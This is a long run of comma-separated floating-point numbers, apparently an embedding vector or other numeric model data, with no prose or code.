0.027824994176626205, 0.001127766678109765, -0.003012287663295865, 0.035793934017419815, -0.011842930689454079, -0.005538485012948513, -0.046929821372032166, -0.015716923400759697, -0.008823278360068798, 0.028428925201296806, -0.0036567258648574352, -0.0418921560049057, -0.003128286451101303, -0.0024212459102272987, 0.04168593883514404, 0.03399686887860298, 0.014501698315143585, 0.009788094088435173, -0.04206891730427742, -0.011916580609977245, 0.017145736142992973, -0.024554932489991188, -0.03997725620865822, 0.017307765781879425, -0.008160427212715149, -0.024392902851104736, 0.007265578955411911, -0.0002208351215813309, -0.02592482417821884, 0.015731655061244965, -0.00924308318644762, -0.025482922792434692, 0.016350314021110535, -0.046311162412166595, -0.018972257152199745, 0.00030150494421832263, -0.05397076904773712, 0.013242281973361969, -0.04660576209425926, -0.03435039147734642, -0.016099903732538223, 0.01117271464318037, -0.0019277904648333788, 0.0329657681286335, -0.0007346594356931746, -0.010723449289798737, -0.016865864396095276, -0.020091738551855087, 0.029209615662693977, 0.008094142191112041, 0.0025593398604542017, 0.03709017485380173, -0.01665964536368847, 0.021093379706144333, -0.0398004949092865, -0.01232165563851595, -0.00871280301362276, -0.023361800238490105, 0.009655524045228958, -0.007339228875935078, 0.021535279229283333, -0.014678457751870155, -0.01629139482975006, 0.0033915855456143618, 0.007814272306859493, -0.004028658848255873, 0.020297957584261894, -0.04091997817158699, 0.0017436653142794967, -0.03517527133226395, -0.005615817382931709, -0.01038465928286314, 0.0014085575239732862, 0.015996795147657394, 0.015746384859085083, -0.004072848707437515, -0.0103920241817832, 0.0028686700388789177, 0.0035462507512420416, -0.00902949832379818, 0.002866828814148903, -0.004341671243309975, -0.0034265692811459303, 0.015333944000303745, 0.011084334924817085, 0.01744033582508564, -0.0031724765431135893, 0.012041785754263401, -0.01464163325726986, -0.008786452934145927, 0.0019590917509049177, -0.0032719040755182505, 0.042392976582050323, -0.032818470150232315, -0.011504140682518482, 0.015790574252605438, 0.005354359745979309, 0.0037653595209121704, -0.00871280301362276, -0.010480404831469059, 0.03131600841879845, -0.007232436444610357, 0.005626865196973085, -0.014185003004968166, -0.01621774397790432, 0.0007848335080780089, -0.021874070167541504, 0.013846212066709995, 0.018383055925369263, 0.012181720696389675, -0.025895362719893456, 0.005578992422670126, 0.006473840679973364, 0.001851378590799868, -0.014538522809743881, 0.00951558817178011, 0.007110913749784231, -0.005777847487479448, -0.015304483473300934, 0.006411238107830286, -0.010900209657847881, -0.020739858970046043, -0.009412478655576706, 0.020960809662938118, 0.014177638106048107, -0.012174355797469616, 0.036589354276657104, 0.01621774397790432, -0.032464947551488876, -0.0380328930914402, 0.006842091213911772, 0.03161060810089111, 0.020356878638267517, 0.0013339868746697903, -0.0023678496945649385, -0.0007691828650422394, -0.006661648396402597, 0.014486967585980892, 0.002165311947464943, 0.0023383896332234144, -0.01726357638835907, 0.016895325854420662, 0.005936195142567158, -0.02218339964747429, -0.006757393479347229, 0.014486967585980892, -0.027839725837111473, 0.011334745213389397, -0.021829878911376, 0.002666132291778922, 0.01612936519086361, -0.04622277989983559, 0.0021597882732748985, -0.0013128124410286546, -0.018162107095122337, -0.028178514912724495, 0.028797175735235214, 0.020622018724679947, -0.026690784841775894, -0.012034420855343342, 0.026351993903517723, 0.014538522809743881, -0.01117271464318037, -0.015834763646125793, -0.0025906411465257406, 0.006912058684974909, 0.03311306983232498, -0.015098263509571552, -0.016674375161528587, -0.01735195517539978, 0.010067963972687721, -0.006337588187307119, 0.009441938251256943, 0.006871551275253296, 0.03706071153283119, -0.03446822986006737, 0.01998862810432911, 0.0010964653920382261, 0.009699713438749313, 0.0033253005240112543, 0.0021229630801826715, 0.051938027143478394, 0.04401328042149544, -0.00902949832379818, 0.007527036592364311, -0.014921503141522408, -0.02611631341278553, -0.02636672370135784, 0.0038113908376544714, 0.028325814753770828, -0.006116637960076332, -0.013338026590645313, -0.025836443528532982, 0.03647151216864586, 0.03057950735092163, -0.004964014515280724, -0.015098263509571552, 0.005995115265250206, 0.009935393929481506, -0.03829803317785263, -0.03181682899594307, 0.027972295880317688, 0.022816790267825127, -0.0398004949092865, 0.0006605490343645215, 0.0021524231415241957, -0.0032185078598558903, 0.02454020269215107, -0.014501698315143585, -0.015643274411559105, 0.004371131304651499, -0.0003178460756316781, 0.010252089239656925, -0.01546651404350996, -0.03464499115943909, 0.06251417845487595, -0.013441137038171291, 0.04209837689995766, 0.019605647772550583, 0.03219980746507645, -0.04295272007584572, 0.007409196812659502, 7.659894549760793e-7, -0.012498416006565094, -0.0013910656562075019, -0.010443579405546188, 0.020106468349695206, -0.019487807527184486, 0.01296977698802948, 0.010944399982690811, 0.019856058061122894, -0.015820033848285675, -0.011496775783598423, 0.012815111316740513, -0.0036953920498490334, -0.019001716747879982, -0.014560618437826633, -0.01761709526181221, 0.050494484603405, 0.02953367680311203, -0.014509063214063644, -0.0009869108907878399, -0.000325441244058311, -0.01945834793150425, -0.010561419650912285, -0.04251081869006157, -0.0401245579123497, -0.028266895562410355, -0.05570891126990318, 0.005987750366330147, 0.0058183553628623486, -0.02016538754105568, -0.002627466106787324, 0.0017777284374460578, 0.011467315256595612, -0.026514023542404175, -0.0005532961222343147, -0.00793211255222559, 0.01179137546569109, -0.041597556322813034, 0.0027305760886520147, 0.026793893426656723, -0.007446021772921085, 0.005711562465876341, 0.004743064288049936, 0.009707078337669373, 0.006087177898734808, 0.0013809386873617768, -0.03573501110076904, -0.007924746721982956, -0.01621774397790432, -0.0003974802093580365, 0.016585994511842728, -0.04041915759444237, 0.039829954504966736, 0.027486205101013184, 0.007342911791056395, 0.025733333081007004, -0.02445182204246521, -0.00986174400895834, 0.020047547295689583, 0.034556612372398376, 0.0054427399300038815, -0.004794619511812925, -0.004345353692770004, -0.022640030831098557, 0.01596733368933201, -0.009213623590767384, 0.0015853176591917872, 0.012947681359946728, 0.0008640073356218636, 0.003859263379126787, -0.001686586532741785, 0.011032779701054096, 0.008351917378604412, 0.01296241208910942, -0.009832283481955528, -0.05299858748912811, 0.005424327217042446, 0.04460247978568077, -0.016541805118322372, 0.006996756419539452, 0.026676053181290627, 0.018545087426900864, 0.021756229922175407, -0.03057950735092163, 0.06286769360303879, -0.01963510736823082, 0.03906399384140968, -0.023626940324902534, -0.004323258996009827, -0.005464835092425346, -0.025748062878847122, 0.014612172730267048, 0.013647357001900673, -0.003932913765311241, -0.00009142965427599847, 0.03323090821504593, -0.01322755217552185, 0.006400190759450197, -0.03367280960083008, 0.0038629460614174604, -0.010797100141644478, -0.00436376640573144, -0.03608853369951248, 0.024157222360372543, 0.003973421175032854, -0.01637977547943592, -0.017145736142992973, -0.018206296488642693, -0.015407593920826912, -0.02540927194058895, 0.02165311947464943, -0.0320819690823555, 0.010517229326069355, -0.004713604226708412, 0.020194848999381065, -0.00006789615144953132, 0.012807746417820454, 0.02330288104712963, -0.012196451425552368, 0.014553253538906574, -0.015878954902291298, 0.011246365495026112, -0.0015420482959598303, -0.02891501598060131, 0.007394466549158096, 0.009405113756656647, -0.016232473775744438, 0.024407632648944855, -0.00018769259622786194, 0.021137569099664688, 0.006157145369797945, 0.012793016619980335, 0.0264551043510437, -0.026410913094878197, -0.045191679149866104, 0.0069452011957764626, 0.011091699823737144, -0.0060724481008946896, 0.036500971764326096, 0.007762717083096504, 0.005722610279917717, -0.02269895002245903, 0.05995115265250206, -0.0039476435631513596, 0.006054035387933254, -0.04501492157578468, 0.00550166005268693, -0.017396146431565285, -0.04539790004491806, -0.044042740017175674, 0.010229994542896748, 0.031757909804582596, -0.021093379706144333, 0.03364335000514984, 0.027942834421992302, -0.012483686208724976, 0.022669490426778793, -0.001028339029289782, -0.0069672963581979275, 0.03302469104528427, -0.009707078337669373, 0.023892082273960114, -0.007357641588896513, 0.02216866984963417, 0.01769074611365795, -0.025983743369579315, -0.016055714339017868, 0.012594161555171013, 0.010053234174847603, -0.004709921777248383, -0.04598710313439369, 0.03349604830145836, -0.009051593020558357, -0.00023614052042830735, -0.025203052908182144, 0.042451899498701096, -0.029636787250638008, -0.007269261404871941, -0.02778080478310585, -0.0021689943969249725, -0.01406716275960207, 0.006006163079291582, 0.024039382115006447, 0.001190369250252843, 0.02191825956106186, -0.005921465344727039, -0.0033786967396736145, -0.004374813754111528, -0.017322495579719543, -0.0012990030227229, -0.009456668049097061, -0.023818431422114372, 0.005048712249845266, 0.015260294079780579, -0.01100332010537386, -0.03953535482287407, -0.016615454107522964, 0.032730087637901306, 0.03057950735092163, -0.018088456243276596, -0.04548628255724907, -0.02209501899778843, -0.017278306186199188, -0.014148177579045296, -0.009603968821465969, -0.008587597869336605, -0.008020492270588875, -0.03340766951441765, 0.007762717083096504, 0.048255521804094315, 0.0023991509806364775, 0.014391222968697548, -0.0026642910670489073, 0.0207840483635664, 0.01945834793150425, -0.007387101650238037, -0.038003433495759964, -0.02532089315354824, -0.0020069642923772335, -0.04318840056657791, 0.01038465928286314, 0.00287971762008965, 0.032464947551488876, -0.0029460026416927576, -0.004783571697771549, -0.019399426877498627, 0.003929230850189924, -0.0033087292686104774, -0.034939590841531754, -0.02155000902712345, 0.00845502782613039, -0.014273382723331451, -0.0036383133847266436, 0.004308528732508421, -0.004411639180034399, 0.007460751570761204, -0.007236118894070387, -0.009788094088435173, 0.015054073184728622, -0.03909345343708992, 0.03190520778298378, -0.04171539843082428, -0.017248844727873802, -0.00477252434939146, 0.0021837244275957346, 0.029607325792312622, 0.01494359876960516, -0.002835527528077364, -0.01875130645930767, -0.0008253410342149436, -0.023288151249289513, -0.02454020269215107, -0.019075367599725723, -0.03337820991873741, -0.014472237788140774, 0.01232165563851595, -0.00955241359770298, -0.016527075320482254, 0.015746384859085083, -0.023464910686016083, 0.0038739934097975492, 0.003851898480206728, 0.011076970025897026, 0.004345353692770004, 0.018883876502513885, -0.024157222360372543, -0.010937035083770752, 0.029931386932730675, 0.014221827499568462, -0.0469592809677124, 0.035793934017419815, -0.012910856865346432, 0.006554855965077877, -0.0010292596416547894, 0.03555825352668762, -0.0033013641368597746, 0.009493493475019932, -0.02060728892683983, 0.030255448073148727, 0.011644075624644756, -0.02595428377389908, 0.008270902559161186, -0.02200664021074772, -0.008248807862401009, 0.0012189085828140378, 0.013927227817475796, 0.006031940225511789, 0.01786750555038452, -0.0190164465457201, 0.010090058669447899, -0.0078805573284626, -0.018810227513313293, -0.00034086170489899814, 0.005836767610162497, -0.00815306231379509, 0.017027895897626877, -0.06534233689308167, -0.025630222633481026, -0.015216103754937649, -0.030815187841653824, -0.03962373733520508, -0.03679557144641876, -0.008079412393271923, -0.027294714003801346, 0.0003539806348271668, -0.0028613051399588585, 0.01990024745464325, -0.01432493794709444, -0.006252890452742577, 0.002736099995672703, 0.028355276212096214, -0.019914977252483368, -0.00788792222738266, 0.007420244161039591, 0.023641671985387802, 0.007910016924142838, -0.003281110431998968, 0.03311306983232498, -0.028414195403456688, -0.0179706159979105, -0.004407956264913082, 0.014833123423159122, 0.028414195403456688, -0.026175232604146004, -0.002888923743739724, -0.03302469104528427, -0.01231429073959589, 0.009950123727321625, 0.03084464743733406, -0.01402297243475914, 0.014192367903888226, 0.018250485882163048, 0.017072085291147232, 0.015584354288876057, -0.0026790210977196693, 0.019134286791086197, 0.008064682595431805, -0.02007700875401497, -0.01850089617073536, 0.007490211632102728, -0.018986986950039864, -0.022301239892840385, -0.006157145369797945, 0.028016485273838043, 0.00020886698621325195, -0.031227627769112587, -0.006238160654902458, 0.012689906172454357, 0.016261935234069824, 0.013573707081377506, -0.00700780376791954, 0.013352757319808006, -0.00893375277519226, -0.009088418446481228, -0.017160465940833092, 0.054559968411922455, -0.008491852320730686, -0.011320015415549278, 0.005324899684637785, 0.009044228121638298, -0.005122362170368433, -0.012859301641583443, -0.0036383133847266436, -0.0021579470485448837, 0.0018964891787618399, -0.011702995747327805, -0.016320854425430298, -0.0219919104129076, -0.015731655061244965, -0.0015402069548144937, 0.01823575608432293, -0.006311810575425625, -0.005847815424203873, -0.000051123501179972664, 0.0004656065138988197, -0.017145736142992973, -0.021137569099664688, 0.039564814418554306, -0.021063918247818947, -0.002310770796611905, -0.004982426762580872, -0.007482846733182669, -0.003360284259542823, -0.006101908162236214, -0.011356839910149574, -0.0031724765431135893, 0.03093302808701992, -0.025998473167419434, -0.005556897725909948, 0.004036023747175932, -0.011577790603041649, 0.010156343691051006, -0.009375653229653835, -0.01945834793150425, -0.01551070436835289, -0.004916141740977764, -0.014553253538906574, -0.005159187130630016, 0.0027526712510734797, 0.01432493794709444, 0.06999702006578445, -0.014788933098316193, 0.009699713438749313, -0.024348711594939232, 0.015849493443965912, 0.009302003309130669, -0.011636710725724697, -0.005372772458940744, 0.010156343691051006, -0.007070406340062618, 0.012844571843743324, 0.014214462600648403, 0.012689906172454357, 0.017543446272611618, 0.004595763981342316, 0.004746746737509966, -0.00955241359770298, 0.0013625262072309852, 0.026705514639616013, -0.02191825956106186, 0.0051665520295500755, 0.02305247075855732, 0.010001678951084614, -0.014818393625319004, 0.022802060469985008, -0.02234542928636074, -0.009847014211118221, -0.01043621450662613, -0.015834763646125793, -0.015849493443965912, 0.0033676493912935257, -0.018736576661467552, -0.010635069571435452, -0.0024764835834503174, 0.004720969125628471, -0.023170311003923416, 0.009272543713450432, -0.011283189989626408, -0.011504140682518482, -0.005877275485545397, -0.004488971550017595, -0.016085173934698105, -0.010414119809865952, -0.0019167430000379682, -0.010701354593038559, -0.013654721900820732, 0.034055791795253754, 0.006562220863997936, 0.02339126169681549, 0.004400591365993023, 0.013396946713328362, -0.017513984814286232, 0.017322495579719543, 0.004967696964740753, -0.00394396111369133, 0.0027084811590611935, 0.005531120114028454, -0.00841083750128746, -0.016423964872956276, -0.019738217815756798, -0.0043343063443899155, -0.0022849934175610542, 0.005317534785717726, 0.027059033513069153, -0.011702995747327805, -0.00048286825767718256, -0.011887121014297009, 0.014825758524239063, -0.010900209657847881, 0.024083571508526802, -0.0004356861754786223, 0.02384789101779461, 0.0034265692811459303, -0.014310208149254322, -0.013382216915488243, 0.021962448954582214, -0.009994314052164555, 0.021078648045659065, -0.027766074985265732, -0.022993551567196846, 0.029769357293844223, 0.02287571132183075, -0.017734935507178307, 0.036589354276657104, -0.008182521909475327, 0.029695706441998482, -0.028944475576281548, -0.012174355797469616, 0.0008870229939930141, -0.0032921580132097006, 0.0019903930369764566, -0.013286472298204899, -0.008513947948813438, 0.020931348204612732, 0.013043426908552647, 0.021432168781757355, 0.011997595429420471, -0.001729855895973742, -0.009360923431813717, -0.017337225377559662, -0.0059288302436470985, 0.0070593589916825294, 0.02839946560561657, -0.011614615097641945, -0.03373172879219055, 0.002896288875490427, -0.0029183838050812483, 0.021152298897504807, -0.007762717083096504, -0.009979584254324436, -0.02672024443745613, 0.004555256571620703, 0.004146498627960682, -0.01296977698802948, 0.0012640192871913314, 0.011032779701054096, -0.007652241736650467, 0.0009164829971268773, -0.026337264105677605, -0.02236016094684601, -0.009117878042161465, -0.0162030141800642, 0.029150696471333504, -0.020636748522520065, 0.019325777888298035, 0.012233275920152664, 0.0015079850563779473, -0.021977180615067482, 0.04863850399851799, 0.035617172718048096, 0.004651001654565334, 0.00850658304989338, 0.018545087426900864, 0.0025133085437119007, 0.03125708922743797, -0.028679335489869118, 0.022227590903639793, 0.009117878042161465, -0.007026216480880976, -0.0006729774759151042, -0.0042937989346683025, 0.016276665031909943, 0.039299674332141876, 0.016350314021110535, 0.005998797714710236, -0.015348673798143864, 0.018000075593590736, 0.020828239619731903, 0.027500934898853302, 0.00027112429961562157, 0.01830940693616867, -0.03576447069644928, 0.0003544409410096705, 0.010406753979623318, 0.0043858615681529045, 0.001398430671542883, 0.005221789702773094, -0.03971211612224579, -0.002535403473302722, 0.00010886400559684262, 0.010134248994290829, -0.009979584254324436, 0.0026477198116481304, -0.0033492366783320904, -0.002496737288311124, 0.021387979388237, 0.0008538804831914604, -0.03608853369951248, -0.005067124497145414, -0.014273382723331451, 0.0026532437186688185, 0.010760274715721607, -0.024687502533197403, 0.015628544613718987, 0.008447662927210331, -0.012608891353011131, 0.012564701028168201, 0.003282951656728983, 0.03549933061003685, -0.020371608436107635, -0.0203421488404274, 0.017145736142992973, -0.0143323028460145, -0.021078648045659065, 0.028193244710564613, -0.026499293744564056, 0.0006131367990747094, 0.00742760905995965, -0.037915054708719254, -0.00036640907637774944, -0.0029220664873719215, 0.019134286791086197, -0.007188246585428715, -0.01928158663213253, 0.007114596199244261, -0.007081453688442707, 0.00785109680145979, -0.008646517992019653, -0.001277828705497086, -0.007703796960413456, -0.0076375119388103485, -0.007571226917207241, -0.020106468349695206, 0.005387502256780863, -0.0027103223837912083, -0.013315931893885136, -0.007873192429542542, 0.03217034786939621, -0.02216866984963417, -0.013308566994965076, -0.011401030234992504, 0.009316733106970787, -0.00477252434939146, 0.023626940324902534, 0.007924746721982956, 0.010362564586102962, 0.013124441727995872, -0.006724250968545675, -0.007608051877468824, 0.0003166952810715884, -0.0203421488404274, 0.003314252942800522, 0.008432932198047638, -0.00685682101175189, -0.027736615389585495, 0.019870787858963013, 0.03941751644015312, -0.006473840679973364, -0.0015043026069179177, 0.0148552181199193, -0.0377088338136673, -0.01064243447035551, -0.005936195142567158, 0.003999198786914349, 0.009522954002022743, -0.004043388646095991, 0.0016663327114656568, 0.008779088035225868, 0.01691005565226078, -0.000962974620051682, 0.008926387876272202, 0.014494333416223526, -0.011121160350739956, -0.008874832652509212, 0.002226073294878006, -0.0002598466526251286, 0.01708681508898735, -0.01858927682042122, -0.018029537051916122, 0.014619538560509682, 0.00331977684982121, 0.00902213342487812, -0.008477122522890568, -0.007258214056491852, 0.007755352184176445, 0.018176836892962456, 0.005277027375996113, -0.0069452011957764626, 0.007792177144438028, 0.001957250526174903, 0.010576149448752403, -0.005995115265250206, -0.00022152559540700167, 0.00933882873505354, -0.0033473954536020756, 0.027221065014600754, -0.023450180888175964, -0.00504134688526392, 0.018014805391430855, -0.0007005962543189526, 0.00436376640573144, 0.00026652117958292365, 0.00928727351129055, -0.0008368488634005189, 0.0038997710216790438, -0.0030822553671896458, 0.01126109529286623, -0.0018964891787618399, -0.01929631642997265, 0.00280606746673584, -0.002898130100220442, 0.05514916777610779, 0.003179841674864292, -0.020798778161406517, -0.0028539400082081556, -0.02051890827715397, -0.026661323383450508, 0.012189085595309734, -0.015790574252605438, 0.001553095760755241, 0.005221789702773094, -0.0007668813341297209, 0.0002513308427296579, -0.013175996951758862, 0.030874107033014297, 0.014921503141522408, -0.006889963522553444, 0.012793016619980335, 0.006322858389467001, -0.0028484163340181112, 0.022198129445314407, 0.029651517048478127, 0.02060728892683983, -0.0003351077903062105, -0.021977180615067482, -0.010362564586102962, -0.02190352976322174, 0.013698912225663662, 0.007858461700379848, -0.01520137395709753, 0.0081015070900321, -0.010023773647844791, -0.004746746737509966, -0.0392407551407814, 0.009309368208050728, -0.02935691550374031, -0.01621774397790432, -0.019929707050323486, -0.012903491966426373, 0.035882312804460526, 0.00238994462415576, -0.011938675306737423, -0.033613890409469604, -0.018250485882163048, -0.017513984814286232, -0.0014499856624752283, 0.008256172761321068, -0.002078773221001029, 0.00028493368881754577, -0.030122876167297363, 0.001202337327413261, 0.030284907668828964, 0.014251288026571274, -0.00836664717644453, 0.014604807831346989, -0.01016370952129364, 0.007563862018287182, 0.016409235075116158, -0.018383055925369263, -0.007600686978548765, -0.042717039585113525, 0.015540163964033127, -0.00591410044580698, 0.016762755811214447, 0.02314085140824318, -0.01210070587694645, -0.021314328536391258, 0.012991871684789658, -0.0010218946263194084, -0.00663955369964242, -0.01593787409365177, 0.007917381823062897, -0.01011951919645071, 0.0026016884949058294, 0.015569623559713364, 0.016689104959368706, 0.017852775752544403, -0.019944438710808754, 0.006337588187307119, -0.01148204505443573, 0.00690101133659482, -0.004720969125628471, -0.00793211255222559, 0.002459912095218897, -0.0035425680689513683, -0.01936996728181839, -0.015525434166193008, -0.007504941895604134, -0.0010577990906313062, 0.003881358541548252, 0.013315931893885136, -0.018898606300354004, 0.03128654882311821, 0.012248005717992783, -0.021078648045659065, -0.010679259896278381, 0.020975539460778236, -0.01867765747010708, -0.006422285921871662, 0.03888723626732826, -0.005284392274916172, -0.014560618437826633, -0.010657164268195629, 0.00893375277519226, 0.0015715082408860326, 0.024599121883511543, 0.00122167041990906, 0.011960770934820175, 0.010804465040564537, -0.003474441822618246, 0.010495134629309177, 0.01611463539302349, 0.0021561055909842253, 0.0341736301779747, 0.017057355493307114, -0.0038482160307466984, 0.01938469707965851, 0.003535203170031309, -0.004975061863660812, 0.009950123727321625, -0.0033455542288720608, -0.01008269377052784, -0.006495935842394829, 0.013271741569042206, 0.000748929101973772, -0.0151571836322546, -0.011923945508897305, -0.0148552181199193, 0.021505819633603096, -0.02181514911353588, 0.015142453834414482, -0.006046670489013195, -0.004282751120626926, -0.02101972885429859, -0.010259454138576984, -0.016689104959368706, -0.01489204354584217, -0.006978343706578016, -0.026779163628816605, -0.025910092517733574, 0.025880632922053337, 0.012122800573706627, -0.014582713134586811, -0.005416962318122387, -0.0038739934097975492, 0.0005786133115179837, -0.003249809145927429, -0.007563862018287182, -0.00648120604455471, -0.025041023269295692, -0.01213753130286932, 0.004905094392597675, -0.014317573048174381, -0.013632627204060555, -0.002760036149993539, -0.012424766086041927, -0.0011001478414982557, -0.012955046258866787, -0.016409235075116158, -0.0038997710216790438, 0.02252219058573246, -0.005291757173836231, -0.015672734007239342, 0.0008340870263054967, 0.007983666844666004, -0.003120921552181244, -0.0280606746673584, 0.0025740698911249638, -0.011636710725724697, 0.002566704759374261, 0.005685785319656134, -0.005479564890265465, 0.0003636472101788968, 0.008653882890939713, -0.004308528732508421, 0.0033105704933404922, 0.007040946278721094, 0.012896126136183739, -0.014730012975633144, -0.007287674117833376, 0.028856096789240837, -0.016423964872956276, 0.023435451090335846, -0.005803625099360943, 0.01876603625714779, 0.0005951846251264215, -0.009302003309130669, -0.02043052762746811, 0.01637977547943592, -0.0008727532695047557, 0.020636748522520065, 0.010914939455688, 0.008432932198047638, -0.023862620815634727, -0.0064591108821332455, -0.017558176070451736, -0.0005717086605727673, -0.03311306983232498, 0.0005758514744229615, -0.004518431611359119, 0.004216466099023819, 0.0035609807819128036, 0.006993073970079422, -0.004717286676168442, 0.001872552908025682, -0.0009961171308532357, 0.0031780004501342773, 0.0031872065737843513, 0.010252089239656925, -0.006930471397936344, 0.020798778161406517, 0.0015770320314913988, 0.005137091968208551, 0.022743141278624535, 0.020725129172205925, 0.009972219355404377, 0.017558176070451736, 0.01266781147569418, -0.011540965177118778, -0.017587635666131973, -0.0028134325984865427, -0.018869146704673767, 0.014214462600648403, -0.002557498635724187, -0.005803625099360943, -0.011946041136980057, -0.011327380314469337, 0.004076531156897545, 0.005722610279917717, -0.015289753675460815, 0.0006669934373348951, -0.00238994462415576, -0.01779385656118393, -0.012255370616912842, -0.013360122218728065, 0.004790936596691608, -0.009581873193383217, -0.001567825791426003, -0.03767937421798706, -0.020224308595061302, 0.007725892122834921, -0.01183556579053402, -0.0018771560862660408, -0.029032856225967407, -0.014604807831346989, 0.012734096497297287, 0.01822102628648281, -0.002180041978135705, -0.0006886281189508736, -0.004941919352859259, 0.00929463841021061, -0.00011697701847879216, -0.012248005717992783, 0.0016000476898625493, -0.0010099265491589904, -0.002141375560313463, 0.011165349744260311, 0.0023936270736157894, -0.012432130984961987, -0.005199694540351629, 0.00894111767411232, -0.014847853220999241, 0.014464872889220715, 0.028797175735235214, 0.001490493188612163, -0.008138332515954971, -0.0018964891787618399, -0.01148940995335579, -0.011437855660915375, -0.006669013295322657, 0.014221827499568462, 0.0067831710912287235, -0.009257812984287739, -0.021491089835762978, -0.0019167430000379682, 0.011857660487294197, -0.00015535560669377446, 0.010966494679450989, 0.004949284251779318, 0.015216103754937649, 0.0004633049538824707, -0.006120320409536362, 0.01064979936927557, -0.0022610570304095745, 0.007762717083096504, 0.02618996426463127, 0.007504941895604134, 0.0070372638292610645, -0.007269261404871941, -0.01903117634356022, -0.008440298028290272, -0.0011047510197386146, -0.014722648076713085, 0.0005127885960973799, -0.01998862810432911, 0.0151571836322546, 0.016173554584383965, -0.018957527354359627, 0.010045869275927544, -0.015407593920826912, 0.018029537051916122, -0.0013772562379017472, -0.027648234739899635, 0.003767200978472829, -0.01832413673400879, -0.0009058958385139704, 0.02076931856572628, -0.011644075624644756, -0.022816790267825127, -0.010620339773595333, 0.006039305590093136, 0.008315092884004116, -0.022419080138206482, -0.014958328567445278, -0.005693150218576193, -0.009162068367004395, -0.011143255047500134, -0.008270902559161186, 0.0010614815400913358, 0.016512345522642136, -0.010450944304466248, 0.023700591176748276, 0.0015337626682594419, -0.005567945074290037, -0.006282350514084101, 0.015127724036574364, 0.029946116730570793, -0.006886281073093414, -0.008867467753589153, -0.0190164465457201, -0.002432293491438031, 0.006013527978211641, 0.00011030248424503952, 0.0029312726110219955, -0.012468956410884857, -0.023155581206083298, 0.0018559816526249051, -0.008182521909475327, 0.0036456782836467028, -0.03140438720583916, 0.019060637801885605, 0.00013176456559449434, -0.0013754150131717324, 0.002196613233536482, 0.0044779242016375065, 0.001006243983283639, 0.015658004209399223, -0.0246433112770319, -0.011452585458755493, 0.0006416761898435652, 0.001475763157941401, 0.025394542142748833, 0.010355199687182903, -0.016320854425430298, -0.013941957615315914, 0.01646815426647663, -0.002089820569381118, -0.007968937046825886, -0.004813031759113073, -0.0043343063443899155, -0.002288675867021084, -0.028590954840183258, -0.002644037362188101, 0.010067963972687721, -0.02507048286497593, -0.009471398778259754, 0.022124480456113815, 0.012984506785869598, 0.003980786073952913, 0.015392864122986794, -0.0037266933359205723, 0.027029573917388916, -0.0013588437577709556, 0.01630612462759018, 0.0030712077859789133, -0.0020824556704610586, -0.009788094088435173, -0.0052991220727562904, -0.00648120604455471, 0.0157611146569252, 0.013094982132315636, 0.0033179353922605515, -0.009832283481955528, -0.006587998475879431, 0.0007981826202012599, 0.006705838721245527, -0.033348750323057175, 0.021844608709216118, 0.02454020269215107, -0.0015724289696663618, -0.020754588767886162, 0.01988551765680313, -0.006503300741314888, -0.008860102854669094, -0.014170272275805473, -0.005435375031083822, -0.014221827499568462, -0.0073134517297148705, -0.009942758828401566, -0.006753711029887199, 0.015716923400759697, -0.002572228666394949, 0.001964615425094962, -0.008602327667176723, -0.0022223908454179764, -0.02436344139277935, -0.0081015070900321, -0.02155000902712345, -0.00659536337479949, -0.024937912821769714, 0.019149016588926315, 0.0006412158836610615, 0.002579593565315008, 0.012955046258866787, 0.014818393625319004, -0.03655989468097687, -0.016011524945497513, 0.007725892122834921, -0.02496737241744995, 0.0009008323540911078, 0.015716923400759697, -0.015584354288876057, 0.008823278360068798, -0.001807188498787582, 0.005578992422670126, 0.014811028726398945, -0.0030251764692366123, 0.020297957584261894, 0.00092891143867746, -0.007346594240516424, 0.01944361813366413, -0.012778286822140217, 0.006308128125965595, 0.011629345826804638, 0.01464163325726986, 0.012763556092977524, 0.00462522404268384, -0.01126109529286623, 0.012498416006565094, -0.006267620716243982, -0.0038187559694051743, 0.016188284382224083, -0.0068052662536501884, -0.01612936519086361, -0.00686050346121192, -0.0014140813145786524, -0.01929631642997265, -0.015569623559713364, -0.029430566355586052, -0.004540526773780584, -0.005063442047685385, 0.015599084086716175, 0.03376119211316109, 0.0019517267355695367, -0.000021044930690550245, 0.008204617537558079, -0.008823278360068798, -0.012240640819072723, -0.026955924928188324, -0.01795588620007038, 0.036854494363069534, 0.006978343706578016, 0.007792177144438028, -0.017513984814286232, 0.004507384262979031, 0.0037653595209121704, 0.0050965845584869385, 0.011076970025897026, -0.025453463196754456, 0.01717519573867321, -0.010274183936417103, 0.010863385163247585, -0.023450180888175964, 0.004783571697771549, 0.023023011162877083, -0.006687426008284092, -0.009125242941081524, -0.005155504681169987, 0.0034228868316859007, -0.022301239892840385, 0.016777485609054565, -0.00038228987250477076, 0.008830643258988857, 0.022286510095000267, 0.01230692584067583, -0.007593321613967419, 0.00819725263863802, -0.021682579070329666, -0.007630147039890289, -0.020386338233947754, -0.01892806775867939, 0.003511267015710473, 0.024834802374243736, -0.014192367903888226, -0.01235111616551876, 0.022860979661345482, 0.0009201655047945678, -0.03673665225505829, -0.0018394103972241282, -0.0175287164747715, 0.013993512839078903, -0.009360923431813717, 0.002509626094251871, 0.005092902109026909, 0.0371490940451622, 0.006017210427671671, -0.013374852016568184, 0.00466941436752677, 0.01639450527727604, -0.015525434166193008, 0.003496536985039711, -0.014295477420091629, -0.0013662087731063366, -0.008970578201115131, -0.006624823436141014, -0.005048712249845266, -0.003807708388194442, 0.022993551567196846, 0.011025414802134037, -0.01779385656118393, 0.0050965845584869385, -0.03552879020571709, -0.006790535990148783, 0.013927227817475796, 0.02418668195605278, 0.009707078337669373, 0.006889963522553444, 0.0015236356994137168, 0.010045869275927544, 0.002634831005707383, -0.02087242901325226, 0.002064043190330267, -0.019738217815756798, 0.013610532507300377, -0.002804226242005825, -0.004813031759113073, -0.008631788194179535, 0.011636710725724697, 0.04050753638148308, -0.0070556765422225, 0.016453424468636513, 0.005435375031083822, 0.003314252942800522, -0.023170311003923416, -0.0009869108907878399, -0.001159067964181304, 0.015849493443965912, -0.011599885299801826, 0.0008626264170743525, -0.04136187583208084, -0.020636748522520065, 0.0037266933359205723, -0.021329058334231377, -0.014008242636919022, -0.015017248690128326, -0.015171913430094719, -0.005428009666502476, -0.02857622504234314, -0.025644952431321144, 0.018383055925369263, 0.013345392420887947, 0.004091260954737663, 0.015481243841350079, 0.01848616637289524, 0.007188246585428715, -0.015672734007239342, -0.00033234592410735786, -0.023450180888175964, 0.0058183553628623486, -0.016099903732538223, -0.0047504291869699955, 0.0016414758283644915, -0.0053101698867976665, 0.0026072124019265175, 0.033171989023685455, 